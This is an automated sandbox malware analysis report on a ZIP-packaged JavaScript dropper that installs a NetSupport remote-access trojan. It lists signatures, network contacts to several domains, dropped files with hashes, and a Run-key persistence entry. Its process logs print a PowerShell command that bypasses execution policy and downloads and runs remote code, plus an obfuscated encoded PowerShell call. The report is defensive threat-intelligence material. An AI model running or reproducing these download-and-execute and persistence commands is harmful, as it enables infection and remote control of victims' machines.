Malware Analysis Report

2024-10-19 01:39

Sample ID 240208-rrm15sed7x
Target 08022024_2226_07022024_DCS7727723772772.zip
SHA256 26f21ada754233191d1980622136860a9f88723aa9254165e6eb0361817d856c
Tags: netsupport persistence rat
Score: 10/10


Analysis Overview

Score: 10/10

SHA256 26f21ada754233191d1980622136860a9f88723aa9254165e6eb0361817d856c

Threat Level: Known bad

The file 08022024_2226_07022024_DCS7727723772772.zip was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-08 14:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-08 14:25

Reported

2024-02-08 14:28

Platform

win7-20231215-en

Max time kernel

120s

Max time network

124s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2836-4-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

memory/2836-5-0x0000000002590000-0x0000000002598000-memory.dmp

memory/2836-6-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2836-7-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-9-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2836-10-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-11-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-12-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-13-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-14-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-08 14:25

Reported

2024-02-08 14:28

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

158s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco …

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 104.26.0.231:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 231.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 33.134.221.88.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/1312-1-0x000001D0B5BC0000-0x000001D0B5BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kz3xi0kr.hnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1312-10-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

memory/1312-11-0x000001D0B5C00000-0x000001D0B5C10000-memory.dmp

memory/1312-12-0x000001D0B5C00000-0x000001D0B5C10000-memory.dmp

memory/724-22-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

memory/724-24-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-23-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-25-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-27-0x0000019DF93D0000-0x0000019DF93E2000-memory.dmp

memory/724-28-0x0000019DF93C0000-0x0000019DF93CA000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 916c03d8fc0c1fd211c254737dff1055
SHA1 948ee4fbae7ce9dc7a37ccaca75341876bbf5d70
SHA256 250e8bbec081ae5e65b669da92652af6d4266db816c8705fbc9be84707914d99
SHA512 ad18049763a0c289f80c0efa21fbe2a44d0d3f4b5f3686ed9be7562e5c9c68f932a8047377e3a5a8a2a6f09046bb12eadf8b6d3b99dfaa81650fa633ccee1050

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

memory/724-76-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 08f9f3eb63ff567d1ee2a25e9bbf18f0
SHA1 6bf06056d1bb14c183490caf950e29ac9d73643a
SHA256 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

memory/1312-82-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c